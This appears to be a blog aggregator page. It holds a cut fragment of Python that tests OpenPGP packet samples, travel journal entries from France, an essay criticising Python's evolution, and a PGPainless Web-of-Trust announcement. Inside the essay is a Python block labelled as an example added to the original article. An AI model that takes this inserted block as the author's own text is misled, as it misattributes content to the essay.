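SAMPLE_COMPRESSED_NEW = bytes([0xC8, 0x03]) + b"\x02\x78\x9c"  # new format, tag 8
SAMPLE_COMPRESSED_OLD = bytes([0xA3]) + b"\x01\x00\x00"        # old format, tag 8

if __name__ == "__main__":
    for name, blob in [
        ("single signature", SAMPLE_NEW_SIG),
        ("list of signatures", SAMPLE_NEW_SIG + SAMPLE_OLD_SIG),
        ("compressed (new format)", SAMPLE_COMPRESSED_NEW),
        ("compressed (old format)", SAMPLE_COMPRESSED_OLD),
    ]:
        print(f"{name}: {verdict(blob)}")
```
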

On the train it was chilly, they must have had the air conditioning on so I had to get my hoodie. When we finally arrived in Bordeaux however, the air outside was warm enough to go T-shirt only again. The train station Bordeaux Saint-Jean is massive. When I left the building at the front, at first I didn’t notice that what I was now seeing was only about a third of the whole station building. What I thought was the main entrance was just a side wing. I could admire the rest while walking past the station, heading to the river.

Bordeaux is built around the Garonne river. I believe that the name Bordeaux actually comes from “a bord de l’eau”, but I could totally be wrong about this. My hostel was another 5km away from the station, so I had quite a bit of way ahead of me. Along the Garonne, there are parks (surprise!) for sports and relaxation, as well as a nice boulevard for pedestrians. There is even a large, ankle-deep water area which was used by a lot of people to cool down their feet. I too took the opportunity.

Relief for tortured feet

Eventually I arrived at the hostel. I had read on the internet the day before that they had a laundry room. After almost a week of travel I was running low on fresh shirts, so it was about time to do my laundry. The hostel had 3 washing machines along with 3 drying machines, all stacked in a dedicated room. I was told by the receptionist that in order to use them I would have to download an app. Already I feared the worst…

So I went to my room, unpacked my stuff and took my dirty laundry down to the machines. The app was called “AppWash” by Miele. My phone is running LineageOS without proprietary Google Services, so such apps always pose a risk of not working properly for me. Luckily I have a third-party app store which I could use to download the app, and on first sight it didn’t appear to depend on Google services. So let’s give it a try!

On first start, the app prompted to enter credentials. At the bottom was a button to click for new users which would trigger the registration. Here I was asked to enter my phone number. Okay, I don’t know what my phone number has to do with my laundry, but let’s comply. I entered my number and pressed the “Next” button. Nothing happened. The app displayed a text stating that I should now receive an SMS with a code, but that never arrived. I tried again, nothing. I tried different formats for my phone number, e.g. with “+49” at the start (even though there was a drop-down menu for the country), with prefix “0049”, simply with a “0” as you would type it in Germany, nothing helped. I was annoyed.

Eventually I figured out that the vendor also had a web-app which I could successfully use to register. During the registration process I had to enter not only my phone number, but also my name and my full address. Ever heard of data reduction, Miele? Why do you need my full address when I just want to get my damn laundry cleaned in Bordeaux???

The reason is probably billing. In order to pay for the washing, I had to charge my account in the app with 20€ via PayPal. Then I was finally able to select the washing machine that was right in front of me, to start the washing process.

Why have a simple coin slot, when you could have a complicated app system where the user would need to register, giving away their complete personal data and having to remember yet another password, all for the benefit of being digital? Oh, and you now have push messages reminding you to get your laundry out when it’s ready. As if I could not look at the display at the beginning to note the duration and set a timer… This is stupid. Hello Digitalzwangmelder!

But now I have clean laundry again 🙂

After this I went down the boulevard again. I had not eaten much since the breakfast and my stomach was giving signals. I ended up ordering a big Cesar Salad. Normally I refrain from eating meat when possible, but today I cheated. The chicken strips were nice though, so I don’t regret anything. The salad itself was a bit “sandy” though, and I even found a small piece of gravel on my plate?!? Still, it was tasty (not the gravel), so worth it 🙂

Now I am sitting in the hostel’s co-working space with a pint of Belgian beer and reflect on the past day, writing this blog post.

At some point during the day I had a thought: You cannot run away from being lonely. Besides some short exceptions, I haven’t really met anyone yet during my travel. Sure, I crossed many people on the road, but the only people I really talked to were friends and family on the phone. Am I lonely? Maybe. But that’s okay for now, I guess.

I don’t feel lonely. Yet.

On forms of apparent progress

Over the years, I have had a few things to say about technological change, churn, and the appearance of progress, a few of them touching on the evolution and development of the Python programming language. Some of my articles have probably seemed a bit outspoken, perhaps even unfair. It was somewhat reassuring, then, to encounter the reflections of a longstanding author of Python books and his use of rather stronger language than I think I ever used. It was also particularly reassuring because I apparently complain about things in far too general a way, not giving specific examples of phenomena for anything actionable to be done about them. So let us see whether we can emerge from the other end of this article in better shape than we are at this point in it.

Now, the longstanding author in question is none other than Mark Lutz whose books “Programming Python” and “Learning Python” must surely have been bestsellers for their publisher over the years. As someone who has, for many years, been teaching Python to a broad audience of newcomers to the language and to programming in general, his views overlap with mine about how Python has become increasingly incoherent and overly complicated, as its creators or stewards pursue some kind of agenda of supposed improvement without properly taking into account the needs of the broadest reaches of its user community. Instead, as with numerous Free Software projects, an inscrutable “vision” is used to impose change based on aesthetics and contemporary fashions, unrooted in functional need, by self-appointed authorities who often lack an awareness or understanding of historical precedent or genuine user need.

Such assertions are perhaps less kind to Python’s own developers than they should be. Those choosing to shoehorn new features into Python arguably have more sense of precedent than, say, the average desktop environment developer imitating Apple in what could uncharitably be described as an ongoing veiled audition for a job in Cupertino. Nevertheless, I feel that language developers would be rather more conservative if they only considered what teaching their language to newcomers entails or what effect their changes have on the people who have written code in their language. Am I being unfair? Let us read what Mr Lutz has to say on the matter:

The real problem with Python, of course, is that its evolution is driven by narcissism, not user feedback. That inevitably makes your programs beholden to ever-shifting whims and ever-hungry egos. Such dependencies might have been laughable in the past. In the age of Facebook, unfortunately, this paradigm permeates Python, open source, and the computer field. In fact, it extends well beyond all three; narcissism is a sign of our times.

You won’t find a shortage of similar sentiments on his running commentary of Python releases. Let us, then, take a look at some experiences and try to review such assertions. Maybe I am not being so unreasonable (or impractical) in my criticism after all!

Out in the Field

In a recent job, of which more might be written another time, Python was introduced to people more familiar with languages such as R (which comes across as a terrible language, but again, another time perhaps). It didn’t help that as part of that introduction, they were exposed to things like this:

    def method(self, arg: Dict[Something, SomethingElse]):
        return arg.items()

When newcomers are already having to digest new syntax, new concepts (classes and objects!), and why there is a “self” parameter, unnecessary ornamentation, such as the type annotations included in the above, only increases the cognitive burden. It also doesn’t help to then say, “Oh, the type declarations are optional and Python doesn’t really check them, anyway!” What is the student supposed to do with that information? Many years ago now, Java was mocked for confronting its newcomers with boilerplate like this classic:

    public static void main(String[] args)

But exposing things that the student is then directed to ignore is simply doing precisely the same thing for which Java was criticised. Of course, in Python, the above method could simply have been written as follows:

    def method(self, arg):
        return arg.items()

Indeed, for the above method to be valid in the broadest sense, the only constraint on the nature of the “arg” parameter is that it offer an attribute called “items” that can be called with no arguments. By prescriptively imposing a limitation on “arg” as was done above, insisting that it be a dictionary, the method becomes less general and less usable. Moreover, the nature of Python itself is neglected or mischaracterised: the student might believe that only a certain type would be acceptable, just as one might suggest that the author of that code also fails to see that a range of different, conformant kinds of objects could be used with the method. Such practices discourage or conceal polymorphism and generic functionality at a point when the beginner’s mind should be opened to them.
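The behaviour described above, as an added example that is not part of the original article: the annotated and the plain method both accept any object offering a callable "items", the annotation is recorded as metadata but never enforced at run time, and the only real failure is a missing attribute. The class names `PairList`, `Annotated` and `Plain` and the concrete `Dict[str, int]` are assumptions made for this illustration.

```python
from typing import Dict, get_type_hints


class PairList:
    """Neither a dict nor a Mapping: it only offers items()."""

    def __init__(self, pairs):
        self._pairs = list(pairs)

    def items(self):
        return iter(self._pairs)


class Annotated:
    def method(self, arg: Dict[str, int]):
        return arg.items()


class Plain:
    def method(self, arg):
        return arg.items()


def collect(obj, arg):
    """Call obj.method(arg) and return the resulting pairs as a sorted list."""
    return sorted(obj.method(arg))


def accepts(obj, arg):
    """True if obj.method(arg) runs; the only run-time constraint is that
    arg has a callable 'items' attribute."""
    try:
        obj.method(arg)
        return True
    except (AttributeError, TypeError):
        return False


def annotation_of(cls):
    """Return the recorded annotation for 'arg', or None if there is none."""
    return get_type_hints(cls.method).get("arg")


if __name__ == "__main__":
    pairs = PairList([("b", 2), ("a", 1)])
    print(collect(Annotated(), pairs))       # annotation says Dict, PairList works
    print(collect(Plain(), {"a": 1, "b": 2}))
    print(accepts(Annotated(), 42))          # int has no items(): the real constraint
    print(annotation_of(Annotated), annotation_of(Plain))
```
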

As Mr Lutz puts such things in the context of a different feature introduced in Python 3.5:

To put that another way: unless you’re willing to try explaining a new feature to people learning the language, you just shouldn’t do it.

The tragedy is that Python in its essential form is a fairly intuitive and readable language. But as he also says in the specific context of type annotations:

Thrashing (and rudeness) aside, the larger problem with this proposal’s extensions is that many programmers will code them—either in imitation of other languages they already know, or in a misguided effort to prove that they are more clever than others. It happens. Over time, type declarations will start appearing commonly in examples on the web, and in Python’s own standard library. This has the effect of making a supposedly optional feature a mandatory topic for every Python programmer.

And I can certainly say from observation that in various professional cultures, including academia where my own recent observations were made, there is a persistent phenomenon where people demonstrate “best practice” to show that they as a software development practitioner (or, indeed, a practitioner of anything else related to the career in question) are aware of the latest developments, are able to communicate them to their less well-informed colleagues, and are presumably the ones who should be foremost in anyone’s consideration for any future hiring round or promotion. Unfortunately, this enthusiasm is not always tempered by considered reflection, either on the nature of the supposed innovation itself, or on the consequences its proliferation will have.

Perversely, such enthusiasm, provoked by the continual hustle for funding, positions, publications and reputation, risks causing a trail of broken programs, and yet at the same time, much is made of the need for software development to be done “properly” in academia, that people do research that is reproducible and whose computational elements are repeatable. It doesn’t help that those ambitions must also be squared with other apparent needs such as offering tools and services to others. And the need to offer such things in a robust and secure fashion sometimes has to coexist with the need to offer them in a convenient form, where appropriate. Taking all of these things into consideration is quite the headache.

A Positive Legacy

Amusingly, some have come to realise that Python’s best hope for reproducible research is precisely the thing that Python’s core developers have abandoned – Python 2.7 – and precisely because they have abandoned it. In an article about reproducing old, published results, albeit of a rather less than scientific nature, Nicholas Rougier sought to bring an old program back to life, aiming to find a way of obtaining or recovering the program’s sources, constructing an executable form of the program, and deploying and running that program on a suitable system. To run his old program, written for the Apple IIe microcomputer in Applesoft BASIC, required the use of emulators and, for complete authenticity, modern hardware expansions to transfer the software to floppy disks to run on an original Apple IIe machine.

And yet, the ability to revive and deploy a program developed 32 years earlier was possible thanks to the Apple machine’s status as a mature, well-understood platform with an enthusiastic community developing new projects and products. These initiatives were only able to offer such extensive support for a range of different “retrocomputing” activities because the platform has for a long time effectively been “frozen”. Contrasting such a static target with rapidly evolving modern programming languages and environments, Rougier concluded that “an advanced programming language that is guaranteed not to evolve anymore” would actually be a benefit for reproducible science, that few people use many of the new features of Python 3, and that Python 2.7 could equally be such a “highly fertile ground for development” that the proprietary Applesoft BASIC had proven to be for a whole community of developers and users.

Naturally, no language designer ever wants to be told that their work is finished. Lutz asserts that “a bloated system that is in a perpetual state of change will eventually be of more interest to its changers than its prospective users”, which is provocative but also rings true. CPython (the implementation of Python in the C programming language) has always had various technical deficiencies – the lack of proper multithreading, for instance – but its developers who also happen to be the language designers seem to prefer tweaking the language instead. Other languages have gained in popularity at Python’s expense by seeking to address such deficiencies and to meet the frustrated expectations of Python developers. Or as Lutz notes:

While Python developers were busy playing in their sandbox, web browsers mandated JavaScript, Android mandated Java, and iOS became so proprietary and closed that it holds almost no interest to generalist developers.

In parts of academia familiar with Python, languages like Rust and Julia are now name-dropped, although I doubt that many of those doing the name-dropping realise what they are in for if they decide to write everything in Rust. Meanwhile, Python 2 code is still used, against a backdrop of insistent but often ignored requests from systems administrators for people to migrate code to Python 3 so that newer operating system distributions can be deployed. In other sectors, such migration is meant to be factored into the cost of doing business, but in places like academia where software maintenance generally doesn’t get funding, no amount of shaming or passive-aggressive coercion is magically going to get many programs updated at all.

Of course, we could advocate that everybody simply run their old software in virtual machines or containers, just as was possible with that Applesoft BASIC program from over thirty years ago. Indeed, containerisation is the hot thing in places like academia just as it undoubtedly is elsewhere. But unlike the Apple II community who will hopefully stick with what they know, I have my doubts that all those technological lubricants marketed under the buzzword “containers!” will still be delivering the desired performance decades from now. As people jump from yesterday’s hot solution to today’s and on to tomorrow’s (Docker, with or without root, to Singularity/Apptainer, and on to whatever else we have somehow deserved), just the confusion around the tooling will be enough to make the whole exercise something of an ordeal.

A Detour to the Past

Over the last couple of years, I have been increasingly interested in looking back over the course of the last few decades, back to the time when I was first introduced to microcomputers, and even back beyond that to the age of mainframes when IBM reigned supreme and the likes of ICL sought to defend their niche and to remain competitive, or even relevant, as the industry shifted beneath them. Obviously, I was not in a position to fully digest the state of the industry as a schoolchild fascinated with the idea that a computer could seemingly take over a television set and show text and graphics on the screen, and I was certainly not “taking” all the necessary computing publications to build up a sophisticated overview, either.

But these days, many publications from decades past – magazines, newspapers, academic and corporate journals – are available from sites like the Internet Archive, and it becomes possible to sample the sentiments and mood of the times, frustrations about the state of then-current, affordable technology, expectations of products to come, and so on. Those of us who grew up in the microcomputing era saw an obvious progression in computing technologies: faster processors, more memory, better graphics, more and faster storage, more sophisticated user interfaces, increased reliability, better development tools, and so on. Technologies such as Unix were “the future”, labelled as impending to the point of often being ridiculed as too expensive, too demanding or too complicated, perhaps never to see the limelight after all. People were just impatient: we got there in the end.

While all of that was going on, other trends were afoot at the lowest levels of computing. Computer instruction set architectures had become more complicated as the capabilities they offered had expanded. Although such complexity, broadly categorised using labels such as CISC, had been seen as necessary or at least desirable to be able to offer system implementers a set of convenient tools to more readily accomplish their work, the burden of delivering such complexity risked making products unreliable, costly and late. For example, the National Semiconductor 32016 processor, seeking to muscle in on the territory of Digital Equipment Corporation and its VAX line of computers, suffered delays in getting to market and performance deficiencies that impaired its competitiveness.

Although capable and in some respects elegant, it turned out that these kinds of processing architectures were not necessarily delivering what was actually important, either in terms of raw performance for end-users or in terms of convenience for developers. Realisations were had that some of the complexity was superfluous, that programmers did not use certain instructions often or at all, and that a flawed understanding of programmers’ needs had led to the retention of functionality that did not need to be inscribed in silicon with all the associated costs and risks that this would entail. Instead, simpler, more orthogonal architectures could be delivered that offered instructions that programmers or, crucially, their compilers would actually use. The idea of RISC was thereby born.

As the concept of RISC took off, pursued by the likes of IBM, UCB and Sun, Stanford University and MIPS, Acorn (and subsequently ARM), HP, and even Digital, Intel and Motorola, amongst others, the concept of the workstation became more fully realised. It may have been claimed by some commentator or other that “the personal computer killed the workstation” or words to that effect, but in fact, the personal computer effectively became the workstation during the course of the 1990s and early years of the twenty-first century, albeit somewhat delayed by Microsoft’s sluggish delivery of appropriately sophisticated operating systems throughout its largely captive audience.

For a few people in the 1980s, the workstation vision was the dream: the realisation of their expectations for what a computer should do. Although expectations should always be updated to take new circumstances and developments into account, it is increasingly difficult to see the same rate of progress in this century’s decades that we saw in the final decades of the last century, at least in terms of general usability, stability and the emergence of new and useful computational capabilities. Some might well argue that graphics and video processing or networked computing have progressed immeasurably, these certainly having delivered benefits for visualisation, gaming, communications and the provision of online infrastructure, but in other regards, we seem stuck with something very familiar to that of twenty years ago but with increasingly disillusioned developers and disempowered users.

What we might take away from this historical diversion is that sometimes a focus on the essentials, on simplicity, and on the features that genuinely matter makes more of a difference than just pressing ahead with increasingly esoteric and baroque functionality that benefits few and yet brings its own set of risks and costs. And we should recognise that progress is largely acknowledged only when it delivers perceptible benefits. In terms of delivering a computer language and environment, this may necessarily entail emphasising the stability and simplicity of the language, focusing instead on remedying the deficiencies of the underlying language technology to give users the kind of progress they might actually welcome.

A Dark Currency

Mark Lutz had intended to stop commentating on newer versions of Python, reflecting on the forces at work that make Python what it now is:

In the end, the convolution of Python was not a technical story. It was a sociological story, and a human story. If you create a work with qualities positive enough to make it popular, but also encourage it to be changed for a reward paid entirely in the dark currency of ego points, time will inevitably erode the very qualities which made the work popular originally. There’s no known name for this law, but it happens nonetheless, and not just in Python. In fact, it’s the very definition of open source, whose paradigm of reckless change now permeates the computing world.

I also don’t know of a name for such a law of human behaviour, and yet I have surely mentioned such behavioural phenomena previously myself: the need to hustle, demonstrate expertise, audition for some potential job offer, demonstrate generosity through volunteering. In some respects, the cultivation of “open source” as a pragmatic way of writing software collaboratively, marginalising Free Software principles and encouraging some kind of individualistic gift culture coupled to permissive licensing, is responsible for certain traits of what Python has become. But although a work that is intrinsically Free Software in nature may facilitate chaotic, haphazard, antisocial, selfish, and many other negative characteristics in the evolution of that work, it is the social and economic environment around the work that actually promotes those characteristics.

When reflecting on the past, particularly during periods when capabilities were being built up, we can start to appreciate the values that might have been more appreciated at that time than they are now. Python originated at a time when computers in widespread use were becoming capable enough to offer such a higher-level language, one that could offer increased convenience over various systems programming languages whilst building on top of the foundations established by those languages. With considerable effort having been invested in such foundations, a mindset seemed to persist, at least in places, that such foundations might be enduring and be good for a long time.

An interesting example of such attitudes arose at a lower level with the development of the Alpha instruction set architecture. Digital, having responded ineffectively to its competitive threats, embraced the RISC philosophy and eventually delivered a processor range that could be used to support its existing product line-up, emphasising performance and longevity through a “15- to 25-year design horizon” that attempted to foresee the requirements of future systems. Sadly, Digital made some poor strategic decisions, some arguably due to Microsoft’s increasing influence over the company’s strategy, and after a parade of acquisitions, Alpha fell under the control of HP who sacrificed it, along with its own RISC architecture, to commit to Intel’s dead-end Itanium architecture. I suppose this illustrates that the chaos of “open source” is not the only hazard threatening stability and design for longevity.

Such long or distant horizons demand that newer developments remain respectful to the endeavours that have made them possible. Such existing and ongoing endeavours may have their flaws, but recognising and improving those flaws is more constructive and arguably more productive than tearing everything down and demanding that everything be redone to accommodate an apparently new way of thinking. Sadly, we see a lot of the latter these days, but it goes beyond a lack of respect for precedent and achievement, reflecting broader tendencies in our increasingly stressed societies. One such tendency is that of destructive competition, the elimination of competitors, and the pursuit of monopoly. We might be used to seeing such things in the corporate sphere – the likes of Microsoft wanting to be the only ones who provide the software for your computer, no matter where you buy it – but people have a habit of imitating what they see, especially when the economic model for our societies increasingly promotes the hustle for work and the need to carve out a lucrative niche.

So, we now see pervasive attitudes such as the pursuit of the zero-sum game. Where the deficiencies of a technology lead its users to pursue alternatives, defensiveness in the form of utterances such as “no need to invent another language” arises. Never mind that the custodians of the deficient technology – in this case, Python, of course – happily and regularly offer promotional consideration to a company who openly tout their own language for mobile development. Somehow, the primacy of the Python language is a matter for its users to bear, whereas another rule applies amongst its custodians. That is another familiar characteristic of human behaviour, particularly where power and influence accumulates.

And so, we now see hostility towards anything being perceived as competition, even if it is merely an independent endeavour undertaken by someone wishing to satisfy their own needs. We see intolerance for other solutions, but we also see a number of other toxic behaviours on display: alpha-dogging, personality worship and the cultivation of celebrity. We see chest-puffing displays of butchness about Important Matters like “security”. And, of course, the attitude to what went before is the kind of approach that involves boiling the oceans so that it may be populated by precisely the right kind of fish. None of this builds on or complements what is already there, nor does it deliver a better experience for the end-user. No wonder people say that they are jealous of colleagues who are retiring.

All these things make it unappealing to share software or even ideas with others. Fortunately, if one does not care about making a splash, one can just get on with things that are personally interesting and ignore all the “negativity from ignorant, opinionated blowhards”. Although in today’s hustle culture, this means also foregoing the necessary attention that might prompt anyone to discover your efforts and pay you to do such work. On the actual topic that has furnished us with so many links to toxic behaviour, and on the matter of the venue where such behaviour is routine, I doubt that I would want my own language-related efforts announced in such a venue.

Then again, I seem to recall that I stopped participating in that particular venue after one discussion had a participant distorting public health observations by the likes of Hans Rosling to despicably indulge in poverty denial. Once again, broader social, economic and political influences weigh heavily on our industry and communities, with people exporting their own parochial or ignorant views globally, and in the process corrupting and undermining other people’s societies, oblivious to the misery it has already caused in their own. Against this backdrop, simple narcissism is perhaps something of a lesser concern.

At the End of the Tunnel

I suppose I promised some actionable observations at the start of the article, so what might they be?

Respect Users and Investments

First of all, software developers should be respectful towards the users of their software. Such users lend validation to that software, encourage others to use it, and they potentially make it possible for the developers to work on it for a living. Their use involves an investment that, if written off by the developers, is costly for everyone concerned.

And no, the users’ demands for that investment to be protected cannot be disregarded as “entitlement”, even if they paid nothing to acquire the software, at least if the developers are happy to enjoy all the other benefits of the software’s proliferation. As is often said, power and influence bring responsibility. Just as democratically elected politicians have a responsibility towards everyone they represent, regardless of whether those people voted for them or not, software developers have a duty of care towards all of their users, even if it is merely to step out of the way and to let the users take the software in its own direction without seeking to frustrate them as we saw when Python 2 was cast aside.

Respond to User Needs Constructively

Developers should also be responsive to genuine user needs. If you believe all the folklore about the “open source” way, it should have been precisely people’s own genuine needs that persuaded them to initiate their own projects in the first place. It is entirely possible that a project may start with one kind of emphasis and demand one kind of skills only to evolve towards another emphasis or to require other skills. With Python, much of the groundwork was laid in the 1990s, building an interpreter and formulating a capable language. But beyond that initial groundwork, the more pressing challenges lay outside the language design domain and went beyond the implementation of a simple interpreter.

Improved performance and concurrency, both increasingly expected by users, required the application of other skills that might not have been present in the project. And yet, the elaboration of the language continued, with the developers susceptible to persuasion by outsiders engaging in “alpha-dogging” or even insiders with an inferiority complex, being made to feel that the language was not complete or even adequate since it lacked features from the pet languages of those outsiders or of the popular language of the day. Development communities should welcome initiatives to improve their projects in ways that actually benefit the users, and they should resist the urge to muscle in on such initiatives by seeking to demonstrate that they have the necessary solutions when their track record would indicate otherwise. (Or worse still, by reframing user needs in terms of their own narrow agenda as if to say, “Here is what you are really asking for.” Another familiar trait of the “visionary” desktop developer.)

Respect Other Solutions

Developers and commentators more generally should accept and respect the existence of other technologies and solutions. Just because they have their own favourite solution does not de-legitimise something they have just been made aware of. Maybe it is simply not meant for them. After all, not everything that happens in this reality is part of a performance exclusively for any one person’s benefit, despite what some people appear to think. And the existence of other projects doing much the same thing is not necessarily “wasted effort”: another concept introduced from some cult of economics or other.

It is entirely possible to provide similar functionality in different ways, and the underlying implementations may lend those different projects different characteristics – portability, adaptability, and so on – even if the user sees largely the same result on their screen. Maybe we do want to encourage different efforts even for fundamental technologies or infrastructure, not because anyone likes to “waste effort”, but because it gives the systems we build a level of redundancy and resilience. And maybe some people just work better with certain other people. We should let them, as opposed to forcing them to fit in with tiresome, exploitative and time-wasting development cultures, to suffer rudeness and general abuse, simply to go along with an exercise that props up some form of corporate programme of minimal investment in the chosen solution of industry and various pundits.

Develop for the Long Term and for Stability

Developers should make things that are durable so that they may be usable for many years to come. Or they should at least expect that people may want to use them years or even decades from now. Just because something is old does not mean it is bad. Much of what we use today is based on technology that is old, with much of that technology effectively coming of age decades ago. We should be able to enjoy the increased performance of our computers, not have it consumed by inefficient software that drives the hardware and other software into obsolescence. Technological fads come and go (and come back again): people in the 1990s probably thought that virtual reality would be pervasive by now, but experience should permit us to reflect and to recognise that some things were (and maybe always will be) bad ideas and that we shouldn’t throw everything overboard to pander to them, only to regret doing so later.

We live in a world where rapid and uncomfortable change has been normalised, but where consumerism has been promoted as the remedy. Perhaps some old way of doing something mundane doesn’t work any more – buying something, interacting with public agencies, fulfilling obligations, even casting votes in some kinds of elections – perhaps because someone has decided that money can be saved (and, of course, soon wasted elsewhere) if it can be done “digitally” from now on. To keep up, you just need a smartphone, or a newer smartphone, with an “app”, or the new “app”, and a subscription to a service, and another one. And so on. All of that “works” for people as long as they have the necessary interest, skills, time, and money to spend.

But as the last few years have shown, it doesn’t take much to disrupt these unsatisfactory and fragile arrangements. Nobody advocating fancy “digital” solutions evidently considered that people would not already have everything they need to access their amazing creations. And when, as they say, neither love nor money can get you the gadgets you need, it doesn’t even matter how well-off you are: suddenly you get a downgrade in experience to a level that, as a happy consumer, you probably didn’t even know still existed, even if it is still the reality for whole sections of our societies. We have all seen how narrow the margins are between everything apparently being “just fine” and there being an all-consuming crisis, both on a global level and, for many, on a personal level, too.

Recognise Responsibilities to Others

Change can be a positive thing if it carries everyone along and delivers actual progress. Meanwhile, there are those who embrace disruption as a form of change, claiming it to be a form of progress, too, but that form of change is destructive, harmful and exclusionary. It should not be a surprise that prominent advocates of a certain political movement advocate such disruptive change: for them, it doesn’t matter how many people suffer by the ruinous change they have inflicted on everyone as long as they are the ones to benefit; everyone else can wait fifty years or so to see some kind of consolation for the things taken from them, apparently.

As we deliver technology to others, we should not be the ones deepening any misery already experienced by imposing needless and costly change. We should be letting people catch up with the state of technology and allowing them to be comfortable with it. We should invest in long-term solutions that address people’s needs, and we should refuse to be shamed into playing the games of opportunists and profiteers who ridicule anything old or familiar in favour of what they happen to be promoting today. We should demand that people’s investments in hardware and software be protected, that they are not effectively coerced into constantly buying new things and seeing their living standards diminished in other ways, with such consumption burdening our planet’s ecosystem and resources.

Just as we all experience that others have power over us, so we might recognise the power we have over other people. And just as we might expect others to consider our interests, so we might consider the interests of those who have to put up with our decisions. Maybe, in the end, all I am doing is asking for people to show some consideration for the experiences of other people, that their lives not be made any harder than they might already be. Is that really too much to ask? Is that so hard to understand?

Saturday, 07 May 2022

Europe Trip Journal – Entry 5: Bonsoir

This morning I extended my stay in La Rochelle for another day. The night was relatively quiet, since in my 6-bed dormitory only one other bed had been booked. So after a good night of sleep I went to get some breakfast and then straight to the reception to book another night.

With that out of the way I thought it was time to get some work done. Yesterday I had seen some very nice places to work on my way back from the beach, so I quickly went to my room to grab my laptop and went out again. I am glad that I brought my 9-cell battery with me, which gives me a decent amount of battery life while on the road (or in a train, although there is a good chance that French trains will come with outlets).

The spot I had in mind was a bank that was half-way covered by a tree, so there was sufficient room to adapt to the burning sun which slowly crept over the sky. The sea was calm and there was a nice breeze, so it actually got a bit chilly in the shade. It was the perfect balance between heating sun and shade I had to strike.

Today my subject of work was to add support for generating third-party signatures in PGPainless. So far the library was pretty “self-centered”, meaning it was possible to create keys and sign messages, but there wasn’t yet an easy API for signing other keys. That should be about to change.

From the Web-of-Trust specification I had borrowed the terminology of “certifications” and “delegations”. Both terms identify signatures made on another key. Certifications however would be made over “bindings”, which is a term for user-id – self-signature tuples, while delegations would be signatures made over keys. The difference is that a certification is sort of a statement by the issuer, claiming they have checked that a user-id (e.g. the name or an email address of a person) would belong to a certain key, while a delegation is primarily used to specify to what degree the user trusts a key to issue certifications. It is a way to delegate trust, hence the name.

I will go into further detail on this in a future blog post, but for today it is enough to know that there are two different mechanisms at play here. So after having broken my IntelliJ by installing a plugin which would automatically make it switch between light- and dark-mode depending on my OS’s settings, and spending nearly an hour to find a way to uninstall the defective plugin without the need to start IntelliJ, I could finally get to work.

For three hours I sat in the sun, typing away. The result is a first proof-of-concept implementation for issuing third-party signatures. I am quite happy with the outcome, although I identified some places where I was reading the specification wrong previously, so some other places in the code base are now broken 😀 That’s just how it is.

With the first design working, I deemed it good enough for today and packed my things to go back to the hostel, but not without a sun-bath at the beach before! Another 2 hours or so later I felt sunburned, but happy. Unfortunately I had gotten some sunscreen into my eye earlier, which caused it to tear constantly, even now it is still watering a bit. Annoying…

Back at the hostel I took a shower and then relaxed a bit in my bed. Then I decided to check out the hostel’s bar. It’s a nice, open space with big windows and a lot of chairs to chill out and socialize on. Unfortunately this evening there aren’t many people here, so I opted for a beer instead. It’s a locally brewed, dark coffee beer! Tasty!

Today I thought a bit about greetings. It’s something I don’t really think about too much in my usual life. But when in another country with a different language, I have to concentrate to find the right words to greet people, depending on time of day. It made me think about the act of greeting strangers and how nice that actually is. Not that I feel like a particularly nice person when nodding a quick “Bonjour” to someone, I mean the act of greeting someone is something I haven’t really paid that much attention to before. It was more like a ritual without meaning. When I say “Bonsoir”, it’s more like if I was saying “Wunderschönen Abend” instead of my usual “N’abend”. It makes me realize that in fact, this is a nice evening worth noting to strangers.

Bonsoir 🙂

Friday, 06 May 2022

Europe Trip Journal – Entry 3&4: Nantes & La Rochelle

This post is a little bit delayed. Yesterday, after having a petit-dej’ with a room mate I took the metro to get to the train station for my next journey. I tried capturing the atmosphere in the metro with a sound recording.

Metro atmosphere

Arriving at the gate, I then took the train from Paris Montparnasse to Nantes further to the west. This was my first ride on the TGV. At first it was a bit uncomfortable, as the train was rushing through tunnels at ~300km/h, which caused pressure differences in the cabin which were quite noticeable in the ears. But soon there were fewer and fewer tunnels.

Two hours later the train stopped at Nantes. I had no idea where to go first, so I walked straight into the nearby park, the Jardin des Plantes. What a beautiful place to hang out.

My next objective was to find a place to sleep, so I went to the next auberge de jeunesse (youth hostel), only to find that the place had been transformed into a refugee camp. So I had to find something else.

A 5km walk away from the train station was a hostel which I could book a room in. This has been my most expensive stay so far, so I hope from now on I will always find more affordable youth hostels. Arriving at my room I was exhausted and spent the rest of the day in bed. At least this night I could sleep very well 🙂

The next morning I woke up, had breakfast and after a video call I went to the Gare du Nantes train station. On the way I once again meandered through the Jardin des Plantes and admired beautiful plants and ponds.

At the train station, I once again wondered how French trains could all be so punctual. This is not how I know it from Germany, where it’s much more common that trains are delayed or even cancelled completely.

Then it was time to board the IC train to La Rochelle. During the ride, an elderly French woman sat across from me. She fiddled with an insulating drinking bottle seal, which would not let any coffee out. She got so grumpy and even though I barely understand French, I knew she was cursing. At some point she noticed that I was amused, and that in turn made her sneer.

Arriving at La Rochelle, I went to the youth hostel, but it was still closed. It would open up in 2 hours, so I figured it would be best to go to the beach.

After I got nearly sunburned, it was time to check into the hostel, but right after that, I went out again, bought sunscreen in a local super market and went back to the beach where I stayed until the sun started to go down.

A very stony beach

On the way back I followed a path over a small cliff coast. As I am now starting to get used to, everything was lovely planted and neatly trimmed.

I’m thinking of staying another day here in La Rochelle. But now I will try to get some sleep 🙂

Creating an OpenPGP Web-of-Trust Implementation – A Series

I am excited to announce that PGPainless will receive funding from NGI Assure to develop an implementation of the Web-of-Trust specification proposal!

https://nlnet.nl/assure/

The Web-of-Trust (WoT) serves as an example of a decentralized authentication mechanism for OpenPGP. While there are some existing implementations of the WoT in applications such as GnuPG, their algorithms are often poorly documented. As a result, WoT support in client applications is often missing or inadequate.

This is where the aforementioned specification comes into play. This document strives to provide a well-documented description of how to implement the WoT in an interoperable and comprehensible way. There is already an existing implementation by the Sequoia-PGP project (Neal, the author of the specification, is also heavily involved with Sequoia) which can serve as a reference implementation.

Since I imagine implementing the Web-of-Trust isn’t a straight-forward task (even though there is now a specification document), I decided to dedicate a series of blog posts to go along with my efforts. Maybe this helps others implementing it in the future.

What exactly is the Web-of-Trust?

